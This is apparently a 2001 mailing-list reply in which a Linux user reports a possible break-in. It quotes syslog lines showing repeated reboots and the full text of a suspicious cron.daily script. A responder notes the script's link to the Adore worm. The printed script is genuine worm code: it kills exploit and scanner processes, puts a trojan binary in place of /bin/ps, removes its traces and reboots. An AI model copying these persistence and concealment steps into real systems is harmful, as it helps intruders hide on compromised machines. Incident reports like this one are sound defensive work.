RE: hacked?

[ABrady <kcsmart kc rr com>]

On 10-Apr-01 Brock Noland opined:
> 
> Apr 10 06:30:03 nolandbros anacron: anacron startup succeeded
> Apr 10 06:30:03 nolandbros anacron[614]: Anacron 2.3 started on
> 2001-04-10
> Apr 10 06:30:03 nolandbros anacron[614]: Will run job `cron.daily' in 5
> min.
> Apr 10 06:30:04 nolandbros rhnsd: rhnsd startup succeeded
> Apr 10 06:30:04 nolandbros rhnsd[631]: Red Hat Network Services Daemon
> starting up.
> Apr 10 06:30:06 nolandbros linuxconf: Running Linuxconf hooks:
> succeeded
> Apr 10 06:35:03 nolandbros anacron[614]: Job `cron.daily' started
> Apr 10 06:35:06 nolandbros rhnsd[631]: Exiting
> Apr 10 06:35:07 nolandbros rhnsd: rhnsd shutdown succeeded
> Apr 10 06:35:07 nolandbros rc: Stopping keytable:  succeeded
> Apr 10 06:35:07 nolandbros Font Server[599]: terminating
> Apr 10 06:35:08 nolandbros xfs: xfs shutdown succeeded
> Apr 10 06:35:08 nolandbros gpm: gpm shutdown succeeded
> Apr 10 06:35:09 nolandbros sshd[481]: Received signal 15; terminating.
> Apr 10 06:35:09 nolandbros sshd: sshd shutdown succeeded
> Apr 10 06:35:10 nolandbros exim: exim shutdown succeeded
> Apr 10 06:35:11 nolandbros xinetd[466]: Exiting...
> 
> Lock at that.. Then five minutes later it reboots... did it like 100
> times
> in the night..
> 
> 
> [root nolandbros cron.daily]# cat 0anacron
>#!/bin/sh
> if [ -f /sbin/reboot ]; then
> mv /usr/bin/adore /bin/ps
> mv /usr/lib/lib/0anacron-bak /etc/cron.daily/0anacron
> rm -rf /usr/lib/lib
> /sbin/reboot
> exit 0
> fi
> killall -9 lpd >>/dev/null 2>>/dev/null 3>>/dev/null
> killall -9 lpd7.sh >>/dev/null 2>>/dev/null 3>>/dev/null
> killall -9 start-lprng >>/dev/null 2>>/dev/null 3>>/dev/null
> killall -9 bind >>/dev/null 2>>/dev/null 3>>/dev/null
> killall -9 statdx >>/dev/null 2>>/dev/null 3>>/dev/null
> killall -9 start-statd >>/dev/null 2>>/dev/null 3>>/dev/null
> killall -9 start-wu26 >>/dev/null 2>>/dev/null 3>>/dev/null
> killall -9 start-bind >>/dev/null 2>>/dev/null 3>>/dev/null
> killall -9 pscan-bind >>/dev/null 2>>/dev/null 3>>/dev/null
> killall -9 pscan-ftpd >>/dev/null 2>>/dev/null 3>>/dev/null
> killall -9 pscan-lprng >>/dev/null 2>>/dev/null 3>>/dev/null
> killall -9 pscan-statdx >>/dev/null 2>>/dev/null 3>>/dev/null
> killall -9 wuftpd26 >>/dev/null 2>>/dev/null 3>>/dev/null
> killall -9 wuscan >>/dev/null 2>>/dev/null 3>>/dev/null
> killall -9 hackwu26 >>/dev/null 2>>/dev/null 3>>/dev/null
> killall -9 hacklpd >>/dev/null 2>>/dev/null 3>>/dev/null
> killall -9 scan.pl >>/dev/null 2>>/dev/null 3>>/dev/null
> killall -9 .bla >>/dev/null 2>>/dev/null 3>>/dev/null
> killall -9 xargs >>/dev/null 2>>/dev/null 3>>/dev/null
> killall -9 cat >>/dev/null 2>>/dev/null 3>>/dev/null
> mv /usr/bin/adore /bin/ps
               ^^^
Rather interesting name, this one.

> mv /usr/lib/lib/0anacron-bak /etc/cron.daily/0anacron
> rm -rf /usr/lib/lib
> [root nolandbros cron.daily]#
> 
> Thats in cron.daily.. Pretty sure thats not supposed to be there..

I haven't read up on the adore worm. I read about the ramen and tested
for it. I read about the lion and tested for it (and even caught it
working on breaking in at 3AM). But, haven't followed this one at all.
I'd check it out!

---
Capital punishment means never having to say "YOU AGAIN?"